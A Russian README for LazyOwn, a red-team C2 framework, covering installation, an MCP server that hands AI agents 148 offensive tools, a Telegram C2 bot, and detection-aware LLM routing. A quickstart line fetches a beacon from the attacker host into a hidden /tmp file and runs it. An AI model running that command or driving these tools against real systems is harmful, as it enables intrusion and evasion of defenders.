Комплексный red-team фреймворк с C2 на базе AI, полиморфными имплантами и встроенными инструментами пост-эксплуатации.
Современный C2-фреймворк (Command & Control) с поддержкой кастомных имплантов (Demon), reflective loading, sleep obfuscation, OPSEC-режимов и …
Постэксплуатационный фреймворк BC Security (форк оригинального PowerShell Empire). Поддерживает PowerShell, Python и C# агентов. Включает 300+ …
Модульный C2-фреймворк с веб-интерфейсом, поддерживающий множество агентов (Apollo, Poseidon, Medusa и др.) через Docker-контейнеры. Поддерживает Windows, …
.NET C2-фреймворк с веб-интерфейсом. Агент (Grunt) написан на C# и поддерживает HTTP/HTTPS/SMB. Включает ~150 задач: shellcode …
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn bash install.sh
██▓ ▄▄▄ ▒███████▒▓██ ██▓ ▒█████ █ █░███▄ █
▓██▒ ▒████▄ ▒ ▒ ▒ ▄▀░ ▒██ ██▒▒██▒ ██▒▓█░ █ ░█░██ ▀█ █
▒██░ ▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██ ██░▒██░ ██▒▒█░ █ ░█▓██ ▀█ ██▒
▒██░ ░██▄▄▄▄██ ▄▀▒ ░ ░ ▐██▓░▒██ ██░░█░ █ ░█▓██▒ ▐▌██▒
░██████▒▓█ ▓██▒▒███████▒ ░ ██▒▓░░ ████▓▒░░░██▒██▓▒██░ ▓██░
░ ▒░▓ ░▒▒ ▓▒█░░▒▒ ▓░▒░▒ ██▒▒▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ▒░ ▒ ▒
░ ░ ▒ ░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ▓██ ░▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ░░ ░ ▒░
░ ░ ░ ▒ ░ ░ ░ ░ ░ ▒ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░
LazyOwn поставляется БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ. Это свободное программное обеспечение, и вы можете распространять его на условиях GNU General Public License v3. Подробности об использовании этого программного обеспечения см. в файле LICENSE.
LazyOwn — это профессиональный фреймворк для red team и платформа Command & Control (C2), созданная для пентестеров, red team и исследователей безопасности. Он предоставляет 606+ команд CLI, 126 алиасов, 148 MCP-инструментов для ИИ-агентов, многооператорный веб-дашборд C2 и более 120 интеграций плагинов YAML/Lua, охватывающих полный цикл атаки (kill chain) на Linux, Windows, macOS и BSD.
Новое в v0.2.158: встроенный маркетплейс с YARA-правилами и шаблонами Nuclei, автономная эксплуатация auto_pwn, команда hunt для разведки на основе угроз, механизм подсказок после выполнения команд, автоматическое шифрование данных сессий, геймификация с ELO/бейджами и 7 новых APT-плейбуков.
Новичок? Вот весь процесс входа. Полное руководство: QUICKSTART.md.
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn
bash install.sh # virtualenv + pinned dependencies + C2 certificates
./run # launches the shell; first run offers the setup wizard
Установка по умолчанию лёгкая; добавьте --with-ml для тяжёлого стека torch/CUDA, --with-ollama для локального запуска LLM, --with-tools для распространённых внешних бинарников. Зависимости зафиксированы в requirements.txt (кроссплатформенное ядро) и requirements-ml.txt (опциональное ML); pyproject.toml является единственным источником истины.
Для изолированных воспроизводимых задач см. lazyown-docker/README.md.
cd lazyown-docker
./mkdocker.sh build
./mkdocker.sh run --vpn 1
Затем, внутри оболочки (LazyOwn) >:
doctor # preflight: verifies Python, venv, packages, certs, SecLists, tools
wizard # guided config (auto-detects lhost, walks 7 steps)
ping # confirm the target is up and detect its OS
lazynmap # full port + service scan
Если doctor сообщает о блокирующем сбое (красный), исправьте его перед продолжением — он
укажет точную команду pip install / apt install для всего, что
отсутствует. Предупреждения (жёлтые) — это опциональные функции, которые пока можно игнорировать.
LazyOwn построен на модульной, управляемой командами архитектуре, обеспечивающей гибкость и расширяемость для рабочих процессов тестирования безопасности.
LazyOwn объединяет интерфейс командной строки (CLI) на основе cmd2 и веб-интерфейс на основе Flask. Параметры ограничены payload.json, что обеспечивает согласованную конфигурацию между инструментами. Фреймворк поддерживает имитацию противника, планирование задач через команду cron и постоянные автоматизированные рабочие процессы имитации угроз.
Подключите Claude Code к фреймворку LazyOwn через Model Context Protocol (MCP). MCP-сервер предоставляет 148 инструментов, охватывающих полный жизненный цикл взаимодействия.
| Файл | Назначение |
|---|---|
skills/lazyown_mcp.py |
MCP-сервер — предоставляет Claude 148 инструментов LazyOwn |
skills/lazyown.md |
Документация навыка / слэш-команды для Claude Code |
skills/autonomous_daemon.py |
Автономный демон выполнения (управляется целями, не требует Claude между шагами) |
skills/hive_mind.py |
Мультиагентная система «королева + дроны» с памятью ChromaDB |
skills/lazyown_policy.py |
Механизм политик на основе вознаграждений для auto_loop |
skills/lazyown_facts.py |
Структурированное извлечение фактов из XML-файлов nmap и выходных данных инструментов |
skills/lazyown_parquet_db.py |
База знаний Parquet: история сессий, GTFOBins, LOLBas, ATT&CK |
Полное руководство:
QUICKSTART.md
# 1. Clone and install (light by default; add --with-ml for the 2 GB torch/CUDA stack, --with-ollama for the local LLM)
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn && bash install.sh
# 2. Launch, verify the install, then run the wizard
./run
(LazyOwn) > doctor # preflight: Python, venv, packages, certs, SecLists, tools
(LazyOwn) > wizard # auto-detects lhost, walks 7 config steps
# Heavy optional dependencies (pycryptodome, python-libnmap, impacket, ...) are
# imported lazily: a missing package degrades only its feature instead of
# crashing the shell, and the dependent command raises a clear "pip install ..."
# error when used. To audit them without launching the shell (works even if rich
# or cmd2 are broken): python3 -m core.dependencies
# 3. Define your authorized scope, then recon
(LazyOwn) > scope add 10.10.11.0/24 && scope mode enforce
(LazyOwn) > ping && lazynmap && auto_populate && facts_show
# 4. Start C2 (separate terminal)
bash fast_run_as_r00t.sh --no-attach --vpn 1
# 5. Get a shell — Linux BOF-capable beacon
(LazyOwn) > blacksandbeacon
# Then on target: curl -sk "http://<lhost>:<lport>/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &
# 6. Invite teammates (multi-operator)
(LazyOwn) > collab_join alice
# Prints: https://<lhost>:<c2_port>/collab/?operator=alice
Слой совместной работы LazyOwn обеспечивает функциональность командного сервера в реальном времени через
Server-Sent Events (SSE). Он активируется автоматически при запуске lazyc2.py.
Панель управления в браузере — откройте в любом браузере команды:
https://<lhost>:<c2_port>/collab/?operator=<your_handle>
Терминальный SSE-поток:
curl --insecure -N "https://<lhost>:<c2_port>/collab/stream?operator=alice" | jq .
Опубликовать находку для всех операторов:
curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/publish \
-H "Content-Type: application/json" \
-d '{"type":"finding","operator":"alice","payload":{"target":"10.10.11.5","detail":"root via CVE-2024-xxxx"}}'
Заблокировать цель (предотвращает запуск одного и того же инструмента двумя операторами):
curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/lock \
-H "Content-Type: application/json" \
-d '{"target":"10.10.11.5","operator":"alice","ttl_secs":300}'
| Эндпоинт | Метод | Описание |
|---|---|---|
/collab/ |
GET | Панель управления для нескольких операторов в браузере |
/collab/stream?operator=<name> |
GET (SSE) | Поток событий в реальном времени |
/collab/operators |
GET | Список активных операторов |
/collab/publish |
POST | Трансляция структурированного события |
/collab/lock |
POST | Получение рекомендательной блокировки цели |
/collab/unlock |
POST | Снятие блокировки цели |
/collab/locks |
GET | Все активные блокировки |
/collab/history?n=100 |
GET | Последние N событий |
Из CLI: collab_join <handle> выводит все URL для указанного оператора.
LazyOwn предоставляет свой полный фреймворк через Model Context Protocol (MCP). Тот же сервер работает с Claude Code, Claude Desktop, Hermes Agent и OpenCode — выберите интеграцию, соответствующую вашему окружению.
claude mcp add lazyown python3 /home/grisun0/LazyOwn/skills/lazyown_mcp.py
Или добавьте вручную в ~/.claude/claude_desktop_config.json:
{
"mcpServers": {
"lazyown": {
"command": "python3",
"args": ["/home/grisun0/LazyOwn/skills/lazyown_mcp.py"],
"env": {
"LAZYOWN_DIR": "/home/grisun0/LazyOwn"
}
}
}
}
Установите слэш-команду (необязательно):
cp skills/lazyown.md ~/.claude/commands/lazyown.md
После перезапуска Claude Code все инструменты lazyown_* станут доступны.
LazyOwn является родным для Hermes. Слой интеграции skills/hermes-lazyown/ предоставляет компактную, пространственно-именованную поверхность инструментов, оптимизированную для контекстных окон Hermes, с возобновлением контрольных точек, динамической генерацией правил и нативным планированием делегирования.
Зарегистрируйте в ~/.hermes/config.yaml:
mcp_servers:
hermes-lazyown:
command: python3
args: ["/home/grisun0/LazyOwn/skills/hermes-lazyown/mcp_server.py"]
env:
LAZYOWN_DIR: "/home/grisun0/LazyOwn"
Затем перезагрузите MCP-инструменты в Hermes с помощью /reload-mcp.
Полное руководство по интеграции Hermes см. в skills/hermes-lazyown/README.md.
LazyOwn дружелюбен к OpenCode через LazyOwnOpenCodeAdapter:
git clone https://github.com/grisuno/LazyOwnOpenCodeAdapter.git
cd LazyOwnOpenCodeAdapter && npm install
npm run build
Адаптер связывает MCP-сервер LazyOwn с CLI OpenCode, предоставляя ту же поверхность инструментов lazyown_* с нативными для OpenCode подсказками и рабочими процессами.
Полная настройка: https://github.com/grisuno/LazyOwnOpenCodeAdapter
| Переменная | По умолчанию | Описание |
|---|---|---|
LAZYOWN_DIR |
родительская папка skills/ |
Корневой каталог LazyOwn |
LAZYOWN_C2_HOST |
payload.json lhost |
Адрес C2-сервера |
LAZYOWN_C2_PORT |
payload.json c2_port |
Порт C2-сервера |
LAZYOWN_C2_USER |
payload.json c2_user |
Имя пользователя C2 |
LAZYOWN_C2_PASS |
payload.json c2_pass |
Пароль C2 |
| Группа | Инструменты | Описание |
|---|---|---|
| Core Execution | 7 | run_command (теперь с dry_run + confirm), get/set_config, list_modules, discover_commands, command_help, palette |
| Audit & Context | 6 | target_context, tasks_cleanup, evidence_grep, session_diff, run_command_async, job_status |
| Target Management | 3 | add_target, list_targets, set_active_target |
| C2 / Implant Control | 10 | c2_command, c2_status, get_beacons, run_api, c2_profile, c2_vuln_analysis, c2_redop, c2_search_agent, c2_script, c2_adversary |
| Session Awareness | 4 | session_status, session_state, list_sessions, read_session_file |
| Autonomous Loop | 3 | auto_loop, policy_status, recommend_next |
| ACI — Автономный интеллект кампании | 3 | aci_plan, aci_status, aci_replan |
| Reactive Intelligence | 2 | reactive_suggest, bridge_suggest |
| Objectives & Planning | 4 | inject_objective, next_objective, soul, read_prompt |
| Knowledge Bases | 9 | parquet_query/annotate, facts_show, cve_search, searchsploit, rag_index/query, threat_model |
| Memory & Learning | 3 | memory_recall/store, eval_quality |
| Campaign & Reporting | 7 | campaign, campaign_tasks, generate_report, misp_export, collab_publish, timeline |
| Playbooks | 2 | playbook_generate, playbook_run |
| Addons, Tools & Plugins | 3 | list_addons/plugins, create_addon/tool |
| Scheduling | 2 | cron_schedule, daemon |
| AI Agents | 5 | run_agent, agent_status/result, list_agents, llm_ask |
| Event Engine | 4 | poll_events, ack_event, add_rule, heartbeat_status |
| SWAN MoE+RL | 4 | swan_run, swan_ensemble, swan_status, swan_route |
Полная документация: skills/README.md и skills/lazyown.md. |
Добавлено в skills/lazyown_mcp_helpers.py, чтобы сделать автономные аудиты более эффективными и менее подвержёнными ошибкам. Лдика живёт в модуле чистых функций, поэтому его можно изолированно покрывать юнит-тестами (tests/test_mcp_improvements.py).
| Инструмент / Параметр | Что делает | Поч это важно |
|---|---|---|
lazyown_session_init(format='json', include_recommend=true) |
Возвращает SITREP в виде структурированного словаря вместо баннера; опционально встраивает топ-3 ранжированных рекомендуемых действий. | Экономит ~5 КБ декорированного текста на вызов; агенты могут фильтровать до потребления. |
lazyown_campaign_sitrep(format='json') |
Та же опция JSON для главного отчёта смены. | Единый формат для обоих инструментов работы с обстановкой. |
lazyown_target_context(host, port=N) |
Агрегирует открытые порты, учётные данные из мировой модели (с происхождением + уверенностью), уязвимости, свежесть данных pwntomate и свежесть nmap для одной пары (host, port). | Заменяет 4–5 отдельных запросов при принятии решения о следующем действии по цели. |
lazyown_tasks_cleanup(dry_run=true, min_confidence=0.5) |
Аудирует sessions/tasks.json и помечает записи, где встроенное учётное данное на самом деле является меткой времени / URL / IP / дубликатом. Передайте dry_run=false, чтобы переписать файл (сначала создаётся .bak). |
Наблюдатель часто превращает временные метки логов в «учётные данные»; на реальной кампании это убирает 100+ шумных задач. |
lazyown_evidence_grep(pattern, scope='all|loot|nmap|http|logs') |
Регулярное выражение по артефактам в sessions/ с пропуском бинарных файлов и ограничением размера. Возвращает совпадения в формате path:line. |
Позволяет не выходить в оболочку для кросс-проверочных запросов. |
lazyown_run_command(command, dry_run=true) |
Предварительная проверка: возвращает базовую команду, путь к бинарнику, требуется ли ОС или соответствует ли текущей ОС, создаст ли дубликаты артефактов, отсутствующие ключи полезной нагрузки — без выполнения. | Предотвращает случайные повторные запуски 30-минутных сканов; выявляет инструменты, работающие только в Windows, против цели на Linux до запуска. |
lazyown_run_command_async(command, timeout) + lazyown_job_status(job_id) |
Паттерн фоновых задач для длинных команд (lazynmap, pwntomate, auto_loop). Немедленно возвращает job_id. |
Освобождает агента от блокировки на командах, задокументированных как ≥30 мин. |
lazyown_session_diff(take=true) |
Сообщает о добавленных / изменённых / удалённых файлах в sessions/, а также о новых учётных данных / ID задач с момента последнего снимка. |
Делает передачу смены явной; хорошо работает как первый вызов каждой новой сессии. |
Шлюз подтверждения (confirm=true) |
lazyown_c2_command, lazyown_c2_redop, lazyown_c2_adversary и любая run_command, тело которой соответствует rm -rf / exfil / wipe / encrypt-file, теперь требуют явный аргумент confirm=true. |
Предотвращает случайные разрушительные действия из автономных циклов. |
| Происхождение + уверенность по учётным данным | Каждое учётное данное, предоставленное через target_context, включает is_likely_credential, confidence, classification и блок provenance (source_file, line_no, captured_at), если оно найдено. |
Требуется для цепочки хранения в отчётах пентеста. |
| Аннотации свежести | Каждый файл свидетельств в JSON SITREP и target_context несёт age_seconds, age_human и stale=true, как только превысит freshness_threshold_seconds (по умолчанию 7 дней; настраивается при каждом вызове). |
Останавливает агента от использования устаревших разведывательных данных. |
SOLID-слой расширения в cli/cli_enhancements.py подключается к оболочке cmd2 через существующее автообнаружение CommandSet (cli/commands/audit.py). Не потребовалось правок в ядре lazyown.py на 27 тыс. строк, кроме двух небольших хуков (ленивая загрузка алиасов, фолбэк completedefault).
| Команда / хук | Что делает | На чём основана |
|---|---|---|
fz [query] |
Нечёткий поиск команд по всем do_*, алиасам, плагинам и аддонам. Ранжирует точное совпадение > префикс > подстрока > похожесть последовательности. |
FuzzyCommandIndex |
form <command> |
Проводит оператора через интерактивную форму параметров для команд с множеством флагов (сейчас phishing, venom, evil). Проверяет обязательные поля и перечисления options; при неинтерактивном вводе использует значения по умолчанию. |
InteractiveForm, FormSpec |
status_tail [target] |
Разбирает последний sessions/scan_<target>.partial/.nmap и выводит открытые порты, процент завершения и последнюю строку, чтобы оператор мог следить за длинным сканом, не покидая оболочку. |
LiveStatusTail |
grep_log <pattern> [--cmd <name>] |
Регулярное выражение по последнему транскрипту выполненных команд и их выводам. Сохраняется между перезапусками (sessions/_cli_transcript.jsonl). |
TranscriptStore |
reload_addons |
Опрашивает lazyaddons/ и plugins/ и повторно регистрирует всё, что изменилось с последнего прохода, без перезапуска оболочки. |
AddonHotReloader |
audit_complete_keys <command> [partial] |
Показывает, что предложил бы комплeктор, учитывающий полезную нагрузку, для данной команды. Полезно для проверки поведения автодополнения. | PayloadAwareCompleter |
completedefault (Tab) |
Хук cmd2 теперь передаёт управление комплектору, учитывающему полезную нагрузку, который предлагает ключи полезной нагрузки для set/assign, значения IP для target, ключи словарей для gobuster/ffuf, имена аддонов для run, имена плагинов для plugin и захваченные учётные данные для evil/cme/secretsdump. |
PayloadAwareCompleter |
| Динамическое разрешение алиасов | cli/aliases.py теперь по умолчанию использует lazy=True: шаблоны алиасов сохраняют свои плейсхолдеры {rhost}/{lhost} и т.д. и рендерятся относительно self.params во время выполнения. set rhost X распространяется на все алиасы при следующем нажатии клавиши (без перезапуска оболочки). Предподстановка по-прежнему доступна с lazy=False. |
DynamicAliasResolver, cli/aliases.py |
Примитивы не зависят от фреймворка и опираются на небольшие интерфейсы typing.Protocol (PayloadProvider, CommandLister, TerminalIO), благодаря чему их можно юнит-тестировать изолированно. См. tests/test_cli_enhancements.py (36 тестов). |
Оболочка cmd2 устанавливает curses-управляемый нечёткий пикер поверх GNU readline (cli/fuzzy_picker.py). При одиночном нажатии Tab, когда доступны два или более вариантов дополнения, пикер открывает обрамлённый выпадающий список, закреплённый в нижней части терминала, показывающий каждое совпадение вместе с его описанием. Скоринг отдаёт предпочтение точным, префиксным и подпоследовательностным совпадениям перед подстрочными и похожими (тот же рейтинг, что использует отдельная команда fz), а совпавшие символы запроса подсвечиваются в каждой строке, чтобы оператор мог видеть, почему кандидат попал в список.
Навигация: ↑ / ↓ — перемещение, Page Up / Page Down — прыжок, Home / End — поиск, Backspace — редактирование запроса на месте, Tab или Enter — вставка подсвеченной команды в приглашение, Esc или Ctrl-C — отмена. Когда совпадает только один кандидат, сохраняется обычное поведение автовставки readline, чтобы пикер никогда не мешал быстрой работе оператора. Геометрия, цвета и глифы управляются через PickerConfig, а необязательный блок fuzzy_picker в payload.json может переопределить любое из его полей (например, "max_visible_rows": 8) без изменения кода.
config_bannerОболочка cmd2 отображает трёхстрочное приглашение Neon Box, собранное из канонического набора сегментов (user_host, iface, lhost, rhost, domain, public_ip, cwd, git, venv, time, kernel, version, battery_load). Рендерер реализован в cli/banner_config.py как небольшой SOLID-стек: один SegmentRenderer на каждый элемент информации, SegmentRegistry, value-объект BannerSettings и BannerRenderer, который выдаёт ANSI-цветной вывод. Публичный IP, версия ядра и версия LazyOwn кэшируются с TTL, поэтому приглашение остаётся субмиллисекундным после первого рендера.
Команда оболочки config_banner открывает curses-мастер в стиле Powerlevel10k с тремя вкладками — Segments, Colors, Glyphs — и живым предпросмотром итогового приглашения, закреплённым в нижней части панели. Tab / Shift+Tab переключают вкладки; ↑ / ↓ перемещаются внутри активной вкладки; Enter сохраняет в payload.json в блок banner; Escape отменяет. Привязки по вкладкам:
| Вкладка | Клавиши действий |
|---|---|
| Segments | Space включает/выключает сегмент; a включает все сегменты; n выключает все сегменты; d восстанавливает заводские настройки. |
| Colors | Space / → переключает на следующий именованный цвет (bright_green, bright_cyan, bright_magenta, …); ← переключает назад; d восстанавливает цвет сегмента по умолчанию. |
| Glyphs | Space / → переключает на следующий символ для активного слота (top_left, vertical, bullet_primary, arrow, prompt_char_user, …); ← переключает назад; d восстанавливает глиф слота по умолчанию. |
Приглашение оболочки обновляется сразу после сохранения — перезапуск не требуется. Операторы без TTY (CI, скрипты) по-прежнему могут управлять системой с помощью config_banner show и config_banner reset или редактировать payload вручную:
"banner": {
"enabled": ["user_host", "iface", "rhost", "domain", "cwd", "git", "venv", "time"],
"colors": {"user_host": "bright_green", "rhost": "bright_red", "domain": "bright_yellow"},
"glyphs": {"top_left": "┌", "bottom_left": "└", "horizontal": "─", "vertical": "│",
"bullet_primary": "❯", "arrow": "→"}
}
Имена цветов проверяются через ColorRegistry, а символы глифов — через GlyphRegistry; всё неизвестное молча откатывается к заводскому значению по умолчанию, так что некорректный payload никогда не сломает приглашение.
cli/graph_advisor.py загружает граф знаний, построенный /graphify по дереву исходников LazyOwn (graphify-out/graph_lazyown.json — ~1500 узлов, ~2900 рёбер, 14 сообществ), и предоставляет его как оболочке cmd2, так и MCP-серверу. Советник — это одностраничный SOLID-стек — GraphLoader (файловый ввод-вывод с mtime-кэшем), GraphIndex (индексы смежности / степени / сообществ в памяти), GraphScorer (чистый примитив ранжирования), GraphAdvisor (оркестратор) — при этом все константы хранятся в датаклассе GraphAdvisorConfig.
Команды оператора (оболочка cmd2)
| Команда | Назначение |
|---|---|
graph_search <query> [limit] |
Нечёткий поиск узлов по метке, идентификатору или исходному файлу. |
neighbors <node> [depth] [limit] |
Обход графа наружу от узла с указанием отношения и уверенности ребра. |
god_nodes [N] |
Показать наиболее связанные узлы — ключевые абстракции фреймворка. |
suggest_next [seeds…] [N] |
Рекомендовать следующие команды, двигаясь наружу от недавней активности. Без семян читает sessions/LazyOwn_session_report.csv и берёт семена оттуда. |
Хук default() в оболочке теперь передаёт неизвестные команды do_* через тот же советник и существующий FuzzyCommandIndex, так что оператор, вводящий ddo_lazynmap, сразу увидит «Возможно, вы имели в виду: do_lazynmap, do_lazynmap_quick, …?» перед тостом. |
Инструменты MCP (Claude Code, веб-версия Claude, любой MCP-агент)
| Инструмент | Назначение |
|---|---|
lazyown_graph_summary |
Количество узлов, рёбер, сообществ и разрешённый путь к графу. |
lazyown_graph_search |
Нечёткий поиск по узлам с ограничением budget_tokens, чтобы JSON-ответ никогда не превышал контекстное окно агента. |
lazyown_graph_neighbors |
Многоуровневый обход смежности с указанием связи и уверенности — канонический запрос «от чего зависит X?». |
lazyown_graph_suggest_next |
Рекомендация следующего шага; принимает явный список recent или читает транскрипт сессии. |
Каждый инструмент MCP-графа обрезает поля списков на месте, чтобы соответствовать budget_tokens (по умолчанию 1500). Когда граф отсутствует, каждый инструмент возвращает {"available": false, "reason": "..."} вместо сбоя — оператору сообщается выполнить /graphify . один раз, и всё начинает работать.
Советник кэширует по (path, mtime), поэтому свежая пересборка /graphify автоматически подхватывается при следующей команде CLI или вызове MCP без перезапуска оболочки или MCP-сервера. См. tests/test_graph_advisor.py для 20 модульных тестов, покрывающих загрузчик, индекс, скоринг и полный API советника.
cli/reactive_hints.py подключается к конвейеру пост-команд cmd2 через register_postcmd_hook и выводит одну приглушённую строку под выводом каждой команды, перед появлением следующего приглашения:
↳ do_gobuster · do_enum4linux · do_ffuf
Предложение берётся из графа знаний graphify (тот же GraphAdvisor, что используется в suggest_next), поэтому оно структурно обосновано, а не является общим списком. Хук полностью неблокирующий: он возвращает управление до того, как cmd2 отобразит приглашение, так что оператор может сразу начать вводить следующую команду.
Управление
| Действие | Как |
|---|---|
| Отключить подсказки на время сессии | set enable_inline_hints false |
| Включить снова | set enable_inline_hints true |
| Сохранить постоянно | set enable_inline_hints false, затем save |
Команды из списка исключений (help, ?, exit, set, show, palette, dashboard, suggest_next, graph_search, neighbors, god_nodes) никогда не создают строку подсказки — это мета-команды, где предложение добавляет шум.
Когда граф graphify отсутствует, хук молча завершает работу. Выполните /graphify . один раз, чтобы построить граф, и подсказки появятся уже при следующей команде.
dashboardcli/dashboard_tui.py — это полноэкранная панель Textual, запускаемая из оболочки с помощью:
dashboard
Она блокирует оболочку, пока открыта (как htop или lazygit). Нажмите Q или Ctrl-C, чтобы закрыть и вернуться к приглашению cmd2.
Раскладка
┌─ LazyOwn RedTeam Dashboard ─────────────────────────────────────────────────┐
│ TARGET 10.10.11.5 ATTACKER 10.10.14.5 DOMAIN target.htb PHASE RECON OS │
├─────────────────────┬─────────────────────────────────┬─────────────────────┤
│ Kill Chain │ Recent Commands │ Ops │
│ ✔ Recon │ ● lazynmap 2026-05-11 │ Objective: │
│ ▶ Enum │ ● ping 2026-05-11 │ Initial Access │
│ ○ Exploit │ ● gobuster 2026-05-11 │ │
│ ○ PrivEsc │ │ Credentials: 0 │
│ ○ Lateral │ │ Hashes: 0 │
│ ○ Exfil │ Config │ Beacons: 0 │
│ ○ Report │ Target: 10.10.11.5 │ │
│ │ C2 Port: 4444 │ │
├─────────────────────┴─────────────────────────────────┴─────────────────────┤
│ ↳ next: do_gobuster · do_enum4linux · do_ffuf · do_nikto │
└──────────────────────────────────── [Q] Quit [R] Refresh [?] Help ────────┘
Источники данных (автообновление каждые 5 секунд)
| Панель | Источник |
|---|---|
| Цель / фаза / ОС | payload.json, sessions/world_model.json |
| Прогресс цепочки килл-чейна | sessions/world_model.json → completed_phases |
| Последние команды | sessions/LazyOwn_session_report.csv |
| Цель | sessions/world_model.json, sessions/tasks.json |
| Учётные данные / хеши | sessions/credentials*.txt, sessions/hash*.txt |
| Beacon-запросы | sessions/beacons.json |
| Подсказки графа | graphify-out/graph_lazyown.json |
Требуется pip install textual (добавлено в install.sh).
Инструмент MCP lazyown_palette (также доступен как команда CLI palette и веб-представление /palette с глобальным оверлеем Ctrl+K / Cmd+K на каждой странице C2) позволяет агентам и операторам просматривать более 422 команд do_* без прокрутки. Режимы:
| Режим | Пример | Описание |
|---|---|---|
| Обзор | palette |
Количество команд по фазам. |
| Фаза | palette recon |
Все команды в фазе килл-чейна с однострочным описанием. |
| Фаза + фильтр | palette enum nmap |
Список фазы, суженный по свободному текстовому запросу. |
| Поиск | palette --search ldap |
Нечёткий поиск по имени и описанию. |
| Детали | palette --info do_lazynmap |
Полная запись плюс производные от graphify calls и related соседи (какие другие команды используют общие вспомогательные функции с этой). |
| Следующая фаза | palette --next recon |
Рекомендуемые команды в фазе, следующей по порядку килл-чейна. |
Списки calls / related в детальном представлении формируются из |
||
graphify-out/graph_lazyown.json (повторно генерируется навыком graphify); |
||
| при отсутствии этого файла палитра незаметно деградирует до данных только по фазам. |
Бот telegram_hermes.py связывает Telegram с полным фреймворком LazyOwn через слой MCP и шлюз Hermes. Он поддерживает прямое выполнение shell-команд, делегирование автономным агентам, планирование cron-задач, взаимодействие с C2-биконами и кроссплатформенный обмен сообщениями.
| Файл | Назначение |
|---|---|
telegram_hermes.py |
Telegram-бот — связывает Telegram с LazyOwn MCP и шлюзом Hermes |
run_telegram_hermes.sh |
Скрипт запуска с использованием выделенного venv |
venv_telegram/ |
Виртуальное окружение Python с зависимостями python-telegram-bot |
# 1. Create the dedicated virtual environment
cd LazyOwn
python3 -m venv venv_telegram
source venv_telegram/bin/activate
pip install python-telegram-bot nest_asyncio requests
# 2. Configure your bot token in payload.json
python3 -c "import json; p=json.load(open('payload.json')); p['telegram_token']='YOUR_BOTFATHER_TOKEN'; json.dump(p,open('payload.json','w'),indent=2)"
# 3. Launch the bot
./run_telegram_hermes.sh
| Команда | Описание |
|---|---|
/start <secret> |
Аутентификация с C2-секретом из payload.json |
/cmd <command> |
Выполнить любую команду LazyOwn shell |
/sitrep |
Полный отчёт о состоянии кампании |
/config [key] [val] |
Просмотр или установка значений payload.json |
/addcli <client_id> |
Установить активного C2-клиента |
/clients |
Список онлайн C2-имплантов |
/c2 <command> |
Отправить команду C2-бикону |
/agent <goal> |
Запустить автономного агента Groq/Ollama |
/delegate <goal> |
Делегировать задачу субагенту Hermes |
/cron <schedule> <cmd> |
Запланировать повторяющиеся команды LazyOwn |
/status |
Показать статус демона и автономных задач |
/stop |
Остановить любой запущенный автономный демон |
/download <file> |
Скачать файлы из sessions/ |
| Загрузка документа | Загрузить файлы на C2-бикон |
Любое обычное текстовое сообщение без префикса / обрабатывается как прямая команда LazyOwn. Действуют ограничение частоты запросов (5 команд в минуту) и тайм-ауты сессий (30 минут).
Бот использует ту же PTY-основанную систему выполнения команд, что и MCP-сервер (skills/lazyown_mcp.py), поэтому все команды, алиасы и аддоны LazyOwn работают без прямых Python-импортов. Автономные задачи (/agent, /delegate) запускают агентов Groq или Ollama через LazyOwn shell, а C2-команды (/c2, /clients) используют аутентифицированные конечные точки /api/command и /get_connected_clients.
LazyOwn интегрирует многоагентный AI-стек мирового класса, который адаптируется и улучшается в ходе каждого взаимодействия:
modules/moe_router.pyПять LLM-экспертов зарегистрированы с тегами возможностей, базовыми весами и ценовыми уровнями:
| Эксперт | Бэкенд | Сильные стороны |
|---|---|---|
groq_fast |
Groq llama-3.1-8b-instant | Разведка, перечисление, быстрые решения |
groq_powerful |
Groq llama-3.3-70b-versatile | Эксплуатация, пост-эксплуатация, сложные рассуждения |
groq_deepseek_r1 |
Groq deepseek-r1-distill-llama-70b | Повышение привилегий, пошаговые рассуждения |
ollama_reason |
Ollama deepseek-r1:1.5b | Офлайн, безопасно для приватности, детальный анализ |
groq_gemma |
Groq gemma2-9b-it | Боковое перемещение, анализ учётных данных |
Маршрутизация использует температурно-масштабированный softmax (T = max(0.5, 1.5/(1+calls/50))) по скорректированным весам. Веса самонастраиваются через экспоненциальное скользящее среднее наград каждого эксперта с течением времени.
modules/rl_trainer.pyТабличное Q-обучение тренирует политику маршрутизации в ходе сессий взаимодействия:
State: (task_type, engagement_phase, recent_reward_bucket)
Action: expert_id
Reward: r_raw - λ * detection_prob * |r_raw| (λ=0.5)
Update: Q(s,a) ← Q(s,a) + α * [r + γ * max_a' Q(s',a') - Q(s,a)]
Гиперпараметры: α=0,10, γ=0,90, ε_start=0,20, ε_min=0,05, ε_decay=0,995. Эпсилон-жадное исследование затухает с каждым обновлением. Q-значения сохраняются в sessions/expert_qvalues.json между сессиями.
skills/swan_agent.pyИнтеграционный слой верхнего уровня связывает MoE + RL + Detection Oracle + Hive Memory:
swan_run: однокспертное выполнение с RL-управляемой маршрутизацией и пост-выполнительным Q-обновлениемswan_ensemble: N экспертов параллельно через ThreadPoolExecutor, синтезируются через WeightedTextAggregatorOutcomeEvaluator: награда = 0, когда вероятность обнаружения ≥ 70% (формирование награды с учётом обнаружения)modules/detection_oracle.pyПредсказывает вероятность обнаружения до выполнения, используя 17 Sigma-lite правил, покрывающих:
доступ к учётным данным (LSASS, SAM, DCSync), боковое перемещение (PsExec, WMI, evil-winrm), повышение привилегий (имитация токенов, именованные каналы), эксплуатацию, разведку, C2 и брутфорс.
Агрегация вероятностей: P(detect) = 1 - ∏(1 - P_i) по всем сработавшим правилам.
modules/auto_purple.pyАвтоматический цикл измерения red-vs-blue, который выполняет offensive-действия, запрашивает LazyOwnBT для обнаружения и передает результаты обратно в Detection Oracle для калибровки.
(LazyOwn) > purple_exec nmap -sV 10.10.11.5 recon # execute + detect
(LazyOwn) > purple_score # show detection rates
(LazyOwn) > purple_report # export CSV + JSON
